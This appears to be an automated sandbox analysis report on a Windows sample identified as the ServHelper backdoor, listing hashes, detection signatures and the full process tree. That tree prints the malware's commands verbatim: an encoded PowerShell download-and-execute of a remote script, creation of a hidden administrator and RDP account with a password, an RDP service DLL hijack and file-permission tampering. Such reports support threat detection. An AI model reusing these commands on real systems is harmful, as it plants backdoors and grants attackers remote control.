Analysis
-
max time kernel
124s -
max time network
109s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
09-08-2021 04:21
Static task
static1
Behavioral task
behavioral1
Sample
86178014e457120d9dc6f6e27453338c.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
86178014e457120d9dc6f6e27453338c.exe
Resource
win10v20210408
General
-
Target
86178014e457120d9dc6f6e27453338c.exe
-
Size
6.0MB
-
MD5
86178014e457120d9dc6f6e27453338c
-
SHA1
16ab38c0e9c4516532f9d111523e948a6311bfc0
-
SHA256
d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8
-
SHA512
746417e600a1a0cb157f6a74422140b1ed75767a7f47f208c46feadac1dcf845637ce986a11cd7ed3f07e9782ff736b8da448057b0eb65cc50df30baa500bf75
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 12 956 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 1980 icacls.exe 544 icacls.exe 1220 takeown.exe 2024 icacls.exe 1716 icacls.exe 924 icacls.exe 788 icacls.exe 932 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral1/files/0x00040000000130e0-183.dat upx behavioral1/files/0x00050000000130e1-184.dat upx -
Loads dropped DLL 2 IoCs
pid Process 288 Process not Found 288 Process not Found -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 544 icacls.exe 1220 takeown.exe 2024 icacls.exe 1716 icacls.exe 924 icacls.exe 788 icacls.exe 932 icacls.exe 1980 icacls.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
description ioc Process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c261f65c-c5c5-4ee5-8917-969188840c02 powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SI4PKHXK8YLXXEWKMU4Q.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ac43274-53cf-491d-a291-6fa27120fe4c powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2b25da9f-166d-4992-81ce-f6008985f3df powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_80a98c12-462f-4523-a4ff-4fd85ac77c55 powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3b8840d3-d0ba-40c1-9f14-83e71b26a432 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_99079d4f-656b-4ea6-a271-7f41dd686224 powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e2dc9e65-295b-4a25-9b24-30de871d1037 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_466c1ed4-16fc-42f0-a5cf-9ce89880283a powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_515d8fe1-b2f0-42ea-9770-eb3a85b9c8b4 powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_80795e16-a1e7-4269-9c5f-d237f43eef3a powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e411422f-c750-4950-8d1e-f80cc9365c29 powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4073488dd58cd701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 284 reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 86178014e457120d9dc6f6e27453338c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 86178014e457120d9dc6f6e27453338c.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 1472 powershell.exe 1472 powershell.exe 924 powershell.exe 924 powershell.exe 1308 powershell.exe 1308 powershell.exe 1208 powershell.exe 1208 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 956 powershell.exe 956 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 464 Process not Found 288 Process not Found 288 Process not Found 288 Process not Found 288 Process not Found -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 1084 86178014e457120d9dc6f6e27453338c.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 924 powershell.exe Token: SeDebugPrivilege 1308 powershell.exe Token: SeDebugPrivilege 1208 powershell.exe Token: SeRestorePrivilege 1716 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1728 WMIC.exe Token: SeIncreaseQuotaPrivilege 1728 WMIC.exe Token: SeAuditPrivilege 1728 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1728 WMIC.exe Token: SeIncreaseQuotaPrivilege 1728 WMIC.exe Token: SeAuditPrivilege 1728 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 892 WMIC.exe Token: SeIncreaseQuotaPrivilege 892 WMIC.exe Token: SeAuditPrivilege 892 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 892 WMIC.exe Token: SeIncreaseQuotaPrivilege 892 WMIC.exe Token: SeAuditPrivilege 892 WMIC.exe Token: SeDebugPrivilege 956 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1084 wrote to memory of 1472 1084 86178014e457120d9dc6f6e27453338c.exe 30 PID 1084 wrote to memory of 1472 1084 86178014e457120d9dc6f6e27453338c.exe 30 PID 1084 wrote to memory of 1472 1084 86178014e457120d9dc6f6e27453338c.exe 30 PID 1472 wrote to memory of 1752 1472 powershell.exe 32 PID 1472 wrote to memory of 1752 1472 powershell.exe 32 PID 1472 wrote to memory of 1752 1472 powershell.exe 32 PID 1752 wrote to memory of 1348 1752 csc.exe 33 PID 1752 wrote to memory of 1348 1752 csc.exe 33 PID 1752 wrote to memory of 1348 1752 csc.exe 33 PID 1472 wrote to memory of 924 1472 powershell.exe 34 PID 1472 wrote to memory of 924 1472 powershell.exe 34 PID 1472 wrote to memory of 924 1472 powershell.exe 34 PID 1472 wrote to memory of 1308 1472 powershell.exe 36 PID 1472 wrote to memory of 1308 1472 powershell.exe 36 PID 1472 wrote to memory of 1308 1472 powershell.exe 36 PID 1472 wrote to memory of 1208 1472 powershell.exe 38 PID 1472 wrote to memory of 1208 1472 powershell.exe 38 PID 1472 wrote to memory of 1208 1472 powershell.exe 38 PID 1472 wrote to memory of 1220 1472 powershell.exe 40 PID 1472 wrote to memory of 1220 1472 powershell.exe 40 PID 1472 wrote to memory of 1220 1472 powershell.exe 40 PID 1472 wrote to memory of 2024 1472 powershell.exe 41 PID 1472 wrote to memory of 2024 1472 powershell.exe 41 PID 1472 wrote to memory of 2024 1472 powershell.exe 41 PID 1472 wrote to memory of 1716 1472 powershell.exe 42 PID 1472 wrote to memory of 1716 1472 powershell.exe 42 PID 1472 wrote to memory of 1716 1472 powershell.exe 42 PID 1472 wrote to memory of 924 1472 powershell.exe 43 PID 1472 wrote to memory of 924 1472 powershell.exe 43 PID 1472 wrote to memory of 924 1472 powershell.exe 43 PID 1472 wrote to memory of 788 1472 powershell.exe 44 PID 1472 wrote to memory of 788 1472 powershell.exe 44 PID 1472 wrote to memory of 788 1472 powershell.exe 44 PID 1472 wrote to memory of 932 1472 powershell.exe 45 PID 1472 wrote to memory of 932 1472 powershell.exe 45 PID 1472 wrote to memory of 932 1472 powershell.exe 45 PID 1472 wrote to memory of 1980 1472 powershell.exe 46 PID 1472 wrote to memory of 1980 1472 powershell.exe 46 PID 1472 wrote to memory of 1980 1472 powershell.exe 46 PID 1472 wrote to memory of 544 1472 powershell.exe 47 PID 1472 wrote to memory of 544 1472 powershell.exe 47 PID 1472 wrote to memory of 544 1472 powershell.exe 47 PID 1472 wrote to memory of 1360 1472 powershell.exe 48 PID 1472 wrote to memory of 1360 1472 powershell.exe 48 PID 1472 wrote to memory of 1360 1472 powershell.exe 48 PID 1472 wrote to memory of 284 1472 powershell.exe 49 PID 1472 wrote to memory of 284 1472 powershell.exe 49 PID 1472 wrote to memory of 284 1472 powershell.exe 49 PID 1472 wrote to memory of 1276 1472 powershell.exe 50 PID 1472 wrote to memory of 1276 1472 powershell.exe 50 PID 1472 wrote to memory of 1276 1472 powershell.exe 50 PID 1472 wrote to memory of 1424 1472 powershell.exe 51 PID 1472 wrote to memory of 1424 1472 powershell.exe 51 PID 1472 wrote to memory of 1424 1472 powershell.exe 51 PID 1424 wrote to memory of 892 1424 net.exe 52 PID 1424 wrote to memory of 892 1424 net.exe 52 PID 1424 wrote to memory of 892 1424 net.exe 52 PID 1472 wrote to memory of 1612 1472 powershell.exe 53 PID 1472 wrote to memory of 1612 1472 powershell.exe 53 PID 1472 wrote to memory of 1612 1472 powershell.exe 53 PID 1612 wrote to memory of 1192 1612 cmd.exe 54 PID 1612 wrote to memory of 1192 1612 cmd.exe 54 PID 1612 wrote to memory of 1192 1612 cmd.exe 54 PID 1192 wrote to memory of 1716 1192 cmd.exe 55
Processes
-
C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"1⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jwos05d0\jwos05d0.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FB1.tmp" "c:\Users\Admin\AppData\Local\Temp\jwos05d0\CSC22ABBD0B181D470C8ADE18864EE5B39D.TMP"4⤵PID:1348
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1220
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2024
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:924
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:788
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:932
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1980
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:544
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1360
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:284
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1276
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:892
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1848
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1752
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1844
-
C:\Windows\system32\net.exenet start TermService5⤵PID:932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1540
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2272
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2284
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:1220
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:2024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:824
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc x2ZZlQ39 /add1⤵PID:1716
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc x2ZZlQ39 /add2⤵PID:1984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc x2ZZlQ39 /add3⤵PID:892
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:968
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:824
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵PID:956
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵PID:892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵PID:1192
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1336
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1612
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc x2ZZlQ391⤵PID:1716
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc x2ZZlQ392⤵PID:788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc x2ZZlQ393⤵PID:1984
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1308
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1192
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:892
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1212
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1424
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-